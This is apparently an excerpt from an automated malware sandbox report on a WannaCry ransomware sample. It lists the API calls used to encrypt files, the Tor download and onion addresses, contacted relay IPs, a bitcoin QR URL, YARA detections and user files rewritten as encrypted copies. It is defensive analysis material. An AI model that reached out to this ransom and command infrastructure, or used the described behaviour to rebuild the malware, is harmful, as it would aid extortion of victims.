                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 38_2_004026B0 swprintf,FindFirstFileW,#825,#825,wcscmp,wcslen,wcscmp,wcscmp,swprintf,GetFileAttributesW,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z,wcscmp,wcscmp,wcscmp,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,FindNextFileW,FindClose,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,swprintf,swprintf,DeleteFileW,swprintf,DeleteFileW,#825,#825,38_2_004026B0
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\~SDF307.tmpJump to behavior
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\~SDF308.tmpJump to behavior
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Temp\~SDF306.tmpJump to behavior
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\~SDF303.tmpJump to behavior
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\~SDF304.tmpJump to behavior
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\ARM\~SDF305.tmpJump to behavior

                  Networking

                  barindex
                  Installs TOR (Internet Anonymizer)
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeFile created: C:\Users\user\Desktop\TaskData\Tor\tor.exeJump to behavior
                  Found Tor onion address
                  Source: @WanaDecryptor@.exe, 00000019.00000002.6616025428.0000000000198000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: C115p7UMMngoj1pMvkpHijcRdfJNXj6LrLngx7ekbenv2riucmf.onion;57g7spgrzlojinas.onion;xxlvbrloxvriy2c5.onion;76jdd2ir2embyv47.onion;cwwnhwhlz52maqm7.onion;https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip$
                  Source: @WanaDecryptor@.exe, 0000001D.00000002.2976902245.0000000000BA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C115p7UMMngoj1pMvkpHijcRdfJNXj6LrLngx7ekbenv2riucmf.onion;57g7spgrzlojinas.onion;xxlvbrloxvriy2c5.onion;76jdd2ir2embyv47.onion;cwwnhwhlz52maqm7.onion;https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip
                  Source: @WanaDecryptor@.exe, 0000001D.00000002.2975188461.000000000019B000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: C115p7UMMngoj1pMvkpHijcRdfJNXj6LrLngx7ekbenv2riucmf.onion;57g7spgrzlojinas.onion;xxlvbrloxvriy2c5.onion;76jdd2ir2embyv47.onion;cwwnhwhlz52maqm7.onion;https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip$
                  Source: Joe Sandbox ViewIP Address: 171.25.193.9 171.25.193.9
                  Source: Joe Sandbox ViewIP Address: 171.25.193.9 171.25.193.9
                  Source: global trafficTCP traffic: 192.168.11.20:49850 -> 18.18.82.18:9001
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.130.11.147
                  Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.130.11.147
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.130.11.147
                  Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
                  Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
                  Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
                  Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
                  Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
                  Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
                  Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
                  Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
                  Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
                  Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
                  Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
                  Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
                  Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
                  Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
                  Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
                  Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
                  Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
                  Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
                  Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
                  Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
                  Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
                  Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
                  Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
                  Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
                  Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
                  Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
                  Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
                  Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
                  Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
                  Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
                  Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
                  Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
                  Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
                  Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
                  Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
                  Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
                  Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
                  Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
                  Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
                  Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
                  Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
                  Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
                  Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
                  Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
                  Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
                  Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
                  Source: @WanaDecryptor@.exeString found in binary or memory: http://www.btcfrog.com/qr/bitcoinPNG.php?address=%s
                  Source: 2N2jefqo8e.exe, 00000000.00000003.1955905665.0000000000A73000.00000004.00000020.00020000.00000000.sdmp, 2N2jefqo8e.exe, 00000000.00000003.2867204725.0000000000A80000.00000004.00000020.00020000.00000000.sdmp, @WanaDecryptor@.exe, 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmp, @WanaDecryptor@.exe, 00000019.00000000.2870171547.000000000041F000.00000008.00000001.01000000.00000008.sdmp, @WanaDecryptor@.exe, 0000001D.00000000.2872621577.000000000041F000.00000008.00000001.01000000.00000008.sdmp, @WanaDecryptor@.exe, 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmpString found in binary or memory: http://www.btcfrog.com/qr/bitcoinPNG.php?address=%smailto:%shttps://www.google.com/search?q=how
                  Source: @WanaDecryptor@.exe, 00000019.00000003.2894051927.00000000027B8000.00000004.00000020.00020000.00000000.sdmp, @WanaDecryptor@.exe, 00000019.00000003.2893794519.00000000027B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.zlib.net/D
                  Source: taskhsvc.exe, 0000001E.00000003.2944209026.0000000003428000.00000004.00000020.00020000.00000000.sdmp, taskhsvc.exe, 0000001E.00000003.2953031017.000000000446D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://386bsd.net
                  Source: @WanaDecryptor@.exe, 00000019.00000003.2894197945.00000000028B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://blog.torproject.org/blog/lifecycle-of-a-new-relay
                  Source: @WanaDecryptor@.exe, 00000019.00000003.2894197945.00000000028B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://blog.torproject.org/blog/lifecycle-of-a-new-relayError
                  Source: @WanaDecryptor@.exeString found in binary or memory: https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip
                  Source: @WanaDecryptor@.exe, 00000019.00000002.6616025428.0000000000198000.00000004.00000010.00020000.00000000.sdmp, @WanaDecryptor@.exe, 0000001D.00000002.2975188461.000000000019B000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip$
                  Source: @WanaDecryptor@.exe, 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpString found in binary or memory: https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip(B
                  Source: @WanaDecryptor@.exeString found in binary or memory: https://www.google.com/search?q=how
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 25_2_0040DB80 recv,25_2_0040DB80
                  Source: unknownHTTPS traffic detected: 92.205.17.93:443 -> 192.168.11.20:49825 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 92.205.17.93:443 -> 192.168.11.20:49853 version: TLS 1.2
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 25_2_00407C30 OpenClipboard,GlobalAlloc,CloseClipboard,EmptyClipboard,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,25_2_00407C30

                  Spam, unwanted Advertisements and Ransom Demands

                  barindex
                  Yara detected Conti ransomware
                  Source: Yara matchFile source: Process Memory Space: @WanaDecryptor@.exe PID: 1612, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: @WanaDecryptor@.exe PID: 2044, type: MEMORYSTR
                  Detected Wannacry Ransomware
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: CreateFileW,GetFileTime,ReadFile,ReadFile,ReadFile,ReadFile,ReadFile,CloseHandle,CreateFileW,SetFilePointer,SetFilePointer,ReadFile,SetFilePointer,WriteFile,SetFilePointer,SetEndOfFile,CreateFileW,ReadFile,WriteFile,_local_unwind2,SetFilePointerEx,SetEndOfFile,SetFileTime,CloseHandle,MoveFileW,_local_unwind2, WANACRY!25_2_004020A0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: CreateFileW,GetFileTime,ReadFile,ReadFile,ReadFile,ReadFile,ReadFile,CloseHandle,CreateFileW,SetFilePointer,SetFilePointer,ReadFile,SetFilePointer,WriteFile,SetFilePointer,SetEndOfFile,CreateFileW,ReadFile,WriteFile,_local_unwind2,SetFilePointerEx,SetEndOfFile,SetFileTime,CloseHandle,MoveFileW,_local_unwind2, WANACRY!29_2_004020A0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: CreateFileW,GetFileTime,ReadFile,ReadFile,ReadFile,ReadFile,ReadFile,CloseHandle,CreateFileW,SetFilePointer,SetFilePointer,ReadFile,SetFilePointer,WriteFile,SetFilePointer,SetEndOfFile,CreateFileW,ReadFile,WriteFile,_local_unwind2,SetFilePointerEx,SetEndOfFile,SetFileTime,CloseHandle,MoveFileW,_local_unwind2, WANACRY!38_2_004020A0
                  Yara detected Wannacry ransomware
                  Source: Yara matchFile source: 2N2jefqo8e.exe, type: SAMPLE
                  Source: Yara matchFile source: 29.0.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 38.2.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 25.2.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 50.0.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 25.0.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 46.2.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 50.2.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 29.2.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 38.0.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 46.0.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.2N2jefqo8e.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.1955905665.0000000000A73000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000032.00000000.3719845976.000000000041F000.00000008.00000001.01000000.00000008.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000026.00000000.3111499881.000000000041F000.00000008.00000001.01000000.00000008.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000032.00000002.3721585139.000000000041F000.00000008.00000001.01000000.00000008.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001D.00000000.2872621577.000000000041F000.00000008.00000001.01000000.00000008.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.1955338620.0000000000A73000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000002E.00000000.3418001639.000000000041F000.00000008.00000001.01000000.00000008.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000019.00000000.2870171547.000000000041F000.00000008.00000001.01000000.00000008.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.2867204725.0000000000A80000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000002E.00000002.3419901230.000000000041F000.00000008.00000001.01000000.00000008.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: 2N2jefqo8e.exe PID: 5208, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: @WanaDecryptor@.exe PID: 1612, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: @WanaDecryptor@.exe PID: 2044, type: MEMORYSTR
                  Source: Yara matchFile source: C:\Users\user\Desktop\u.wnry, type: DROPPED
                  Source: Yara matchFile source: C:\@WanaDecryptor@.exe, type: DROPPED
                  Source: Yara matchFile source: C:\@WanaDecryptor@.exe, type: DROPPED
                  Source: Yara matchFile source: C:\@WanaDecryptor@.exe, type: DROPPED
                  Source: Yara matchFile source: C:\@WanaDecryptor@.exe, type: DROPPED
                  Source: Yara matchFile source: C:\@WanaDecryptor@.exe, type: DROPPED
                  Source: Yara matchFile source: C:\@WanaDecryptor@.exe, type: DROPPED
                  Source: Yara matchFile source: C:\@WanaDecryptor@.exe, type: DROPPED
                  Modifies existing user documents (likely ransomware behavior)
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile moved: C:\Users\user\Desktop\PIVFAGEAAV.docxJump to behavior
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile moved: C:\Users\user\Desktop\PIVFAGEAAV\EEGWXUHVUG.jpgJump to behavior
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile moved: C:\Users\user\Desktop\SQSJKEBWDT\JDDHMPCDUJ.mp3Jump to behavior
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile moved: C:\Users\user\Desktop\SQSJKEBWDT\SQSJKEBWDT.docxJump to behavior
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile moved: C:\Users\user\Desktop\EEGWXUHVUG\NYMMPCEIMA.pngJump to behavior
                  Writes many files with high entropy
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\craw_window.js.WNCRYT entropy: 7.99934763049Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Local\Intel\CUIPromotions\Images\000000_INTEL.ODYSSEY_ADDITIONAL_GAMEPLAY_ASSET_CUI.2.3-600x300.png.WNCRYT entropy: 7.99918368693Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3075AAB0-B905-4D30-88C9-B63C603DA134}.3.ver0x0000000000000001.db.WNCRYT entropy: 7.99963681436Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x000000000000001f.db.WNCRYT entropy: 7.99804613196Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000c.db.WNCRYT entropy: 7.99767445731Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000d.db.WNCRYT entropy: 7.99765936748Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.31.0_0\eventpage_bin_prod.js.WNCRYT entropy: 7.99698431581Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\craw_background.js.WNCRYT entropy: 7.99969307031Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_7[1].txt.WNCRYT entropy: 7.9989785552Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\flapper.gif.WNCRYT entropy: 7.99746853163Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_8[1].txt.WNCRYT entropy: 7.99567237592Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_9[1].txt.WNCRYT entropy: 7.99704286853Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835233[[fn=Text Sidebar (Annual Report Red and Black design)]].docx.WNCRYT entropy: 7.99635137947Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1024_768_POS4.jpg.WNCRYT entropy: 7.99559540668Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1920_1080_POS4.jpg.WNCRYT entropy: 7.99855344588Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\DataStore\Data\nouser1\120712-0049\DBStore\spartan.edb.WNCRYT entropy: 7.99991415295Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\Windows\AppCache\4IW902AO\5\jquery-2.1.1.min[1].js.WNCRYT entropy: 7.99800634193Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\Windows\AppCache\4IW902AO\5\kernel-1e468708[1].js.WNCRYT entropy: 7.99945433021Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Templates\Normal.dotm.WNCRYT entropy: 7.99101912097Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM01840907[[fn=Equations]].dotx.WNCRYT entropy: 7.99617558904Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM03998158[[fn=Element]].dotx.WNCRYT entropy: 7.99459858157Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM03998159[[fn=Insight]].dotx.WNCRYT entropy: 7.99995237145Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\cert9.db.WNCRYT entropy: 7.99920436324Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\key4.db.WNCRYT entropy: 7.99937265604Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\ProgramData\Microsoft\Windows NT\MSScan\WelcomeScan.jpg.WNCRYT entropy: 7.99958793169Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133196552179353449.txt.WNCRYT entropy: 7.99850576109Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{6d27d8af-3d9b-4d29-b5de-77687cff7d14}\0.0.filtertrie.intermediate.txt.WNCRYT entropy: 7.99522443999Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x0000000000000028.db.WNCRYT entropy: 7.9983176996Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133196552479439416.txt.WNCRYT entropy: 7.998558746Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133196552779536724.txt.WNCRYT entropy: 7.99837283771Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\ProgramData\Intel\GCC\IGCCSvc.db.WNCRYT entropy: 7.99135687516Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\ProgramData\Microsoft\Diagnosis\EventStore.db.WNCRYT entropy: 7.9980147884Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db.WNCRYT entropy: 7.99987053054Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\ProgramData\Microsoft\User Account Pictures\guest.bmp.WNCRYT entropy: 7.99971287808Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\ProgramData\Microsoft\User Account Pictures\user.bmp.WNCRYT entropy: 7.99967222941Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Scans\mpenginedb.db.WNCRYT entropy: 7.99977546025Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\ProgramData\Microsoft\Diagnosis\ScenariosSqlStore\EventStore.db.WNCRYT entropy: 7.99473321431Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\ZxcvbnData\1\passwords.txt.WNCRYT entropy: 7.99910140145Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\ProgramData\Microsoft\Diagnosis\TenantStorage\P-ARIA\EventStore.db.WNCRYT entropy: 7.99333074212Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\ZxcvbnData\1\surnames.txt.WNCRYT entropy: 7.99779266292Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Windows.edb.WNCRYT entropy: 7.99999315711Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\ProgramData\Microsoft\SmsRouter\MessageStore\SmsInterceptStore.db.WNCRYT entropy: 7.99931191891Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\ProgramData\Microsoft\Windows NT\MSFax\VirtualInbox\en-US\WelcomeFax.tif.WNCRYT entropy: 7.99788547196Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png.WNCRYT entropy: 7.99586984813Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png.WNCRYT entropy: 7.99421120158Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png.WNCRYT entropy: 7.99864664469Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png.WNCRYT entropy: 7.99599632611Jump to dropped file
